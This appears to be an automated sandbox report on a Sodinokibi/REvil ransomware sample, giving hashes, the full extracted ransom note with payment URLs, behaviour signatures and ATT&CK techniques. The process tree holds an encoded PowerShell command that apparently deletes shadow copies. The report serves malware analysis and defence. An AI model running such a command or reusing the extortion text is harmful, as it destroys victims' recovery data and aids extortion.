Analysis

  • max time kernel
    145s
  • max time network
    197s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    24-01-2022 01:22

General

  • Target

    a75cf15bfccf9ba17af264a3d90e14a6f9c2266c6072a735aa10bd5a432055d4.exe

  • Size

    156KB

  • MD5

    fb8acbcc610798fbd17b5bad56b0420e

  • SHA1

    49f095e928c2293aac7cb21afb43fb629d77318f

  • SHA256

    a75cf15bfccf9ba17af264a3d90e14a6f9c2266c6072a735aa10bd5a432055d4

  • SHA512

    879fed94f79bca3c25ae292874ae0efe40c40983431a4ef106be3bbe796d32071b16772f6fa184df1c2032daab0f631c7d80a1dd1504df1da5011147f42e9624

Malware Config

Extracted

Path

C:\99ea5t44c-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion 99ea5t44c. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/3B46CD70525B860E 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/3B46CD70525B860E Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: EGunKRe+QNOGIjBdRYKo8X1RGYvkYnAShmh9NUHM7LqQX7wEy+VzqnRMNFc2NtJ+ Bb5nBX4pqPOZurnXDhcw4FyFMGCo5EBrSSy8pkKxovqy0PwJVdcj9PLrFdomBLyn jXueWFcYSgOd+7PkUmCiVUa4XMkJ9JtQU6WRf73TwmhgM29Bw9VTYJsg9kk4Ssi6 eJsA2n9VIa+rlgRMRDbMm8E1cnthdAT7+u8oNe6K1KfR7wjfbHMIahpA7xdHpCOQ i5QwpW6/HHBOkF4WsQWIO6r1NoF0KkpIK6hbTB0sIyibmh5UfLOffPler3wHirMH C7AGgsQTNayORlwP2BgAGHBBxBWuybBKGZj0mYZ5zVyd0C0EGFv/Fm11Ndtg0uWo IvFiSKOI8zS8X4f9S6ys8vn8Y3b8sppjSJjs9N6zPQYyl0yOBgc6pKBChrkCY+7D jMLNGNmO3QkTV2xKSvCOUdFEdmYp8DZoxatREcSOD20BRZOpcrRXEC8DxioMEpHR iMYHLsy5NTm4ZQm1JkXXHk7etBfaY0uzZQrBGZ5cxGD9JPHpVbq4hg081NaMsxU1 fz8dl/kIM0t3GquI3lBCof7fgPLMkB79WtByUKX23wYXJ79DNUht903ck4OIS/r2 nqKqiL6uqGHHcdWoaiPIt231w9VeoisFeeZC93R+/fuCMfgDASViyOxsM+GO4jiz mj0HecQeO1H6WTZJjmaK9fwv4HEtIqwSK//tz84rCi1YWx1c6Ado6Hgi5fegs2Ai OqVhn00Ta+9KkrJlSsJ8qVuvcSJvYnE4JwJUDlux6Ch1meakn85jK8UKggpTDCrN /KljbDIUMe1/J2cAxBeOdXPrSwD3UYXwHFb6C6tm7Um/P8br36M1zz9Dg418RXMx fwjyuGm+pKgznLGvGPG7ulPUbTLsHifnGULCBzq27FuRD8A5hWm3iz5BZVsZCjEB 0YI9npV2BUqsdlqkqmt381EFjX5zqqzCuDQXS8h29PNBEVw0A81QfVfPW1jvimh1 cnXwGI76Ppf1VGLEKYTWKxpoPPR5zRqKqH0mgbqpJUKUJOrRxlxg+SLvO9/rrCWy YVO8UPLDahu7k/VXMLXr54bUH1De8dTGiq27B8F12XnX7FpGFrO3N8pNbrd+PN4Z nfy87I8anshJ2xv/TmA+d9Z1EIhkYkJZbzrNz83U8fv7TWsHf6QQqavQo3DquxUi bByLr7sQUjsBWV/d0CwhNVyqySHUPYflrSJ5fwGZuTD6nJK2ZHwMSCjJdvNtl74F TD04CdYgpAb6OBIc+Cmv/QgULl+ulijoN/8jDrng Extension name: 99ea5t44c ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/3B46CD70525B860E

http://decryptor.cc/3B46CD70525B860E

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Modifies extensions of user files 8 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 23 IoCs
  • Modifies system certificate store 2 TTPs 8 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a75cf15bfccf9ba17af264a3d90e14a6f9c2266c6072a735aa10bd5a432055d4.exe
    "C:\Users\Admin\AppData\Local\Temp\a75cf15bfccf9ba17af264a3d90e14a6f9c2266c6072a735aa10bd5a432055d4.exe"
    1⤵
    • Modifies extensions of user files
    • Adds Run key to start application
    • Enumerates connected drives
    • Drops file in System32 directory
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1260
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:660
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:688
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1048

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Persistence

    Registry Run Keys / Startup Folder

    1
    T1060

    Defense Evasion

    Modify Registry

    3
    T1112

    Install Root Certificate

    1
    T1130

    Discovery

    Query Registry

    1
    T1012

    Peripheral Device Discovery

    1
    T1120

    System Information Discovery

    1
    T1082

    Impact

    Defacement

    1
    T1491

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/660-55-0x000007FEFC081000-0x000007FEFC083000-memory.dmp
      Filesize

      8KB

    • memory/660-56-0x000007FEF33E0000-0x000007FEF3F3D000-memory.dmp
      Filesize

      11.4MB

    • memory/660-58-0x0000000002732000-0x0000000002734000-memory.dmp
      Filesize

      8KB

    • memory/660-57-0x0000000002730000-0x0000000002732000-memory.dmp
      Filesize

      8KB

    • memory/660-59-0x0000000002734000-0x0000000002737000-memory.dmp
      Filesize

      12KB

    • memory/660-60-0x000000000273B000-0x000000000275A000-memory.dmp
      Filesize

      124KB

    • memory/1260-54-0x0000000075D61000-0x0000000075D63000-memory.dmp
      Filesize

      8KB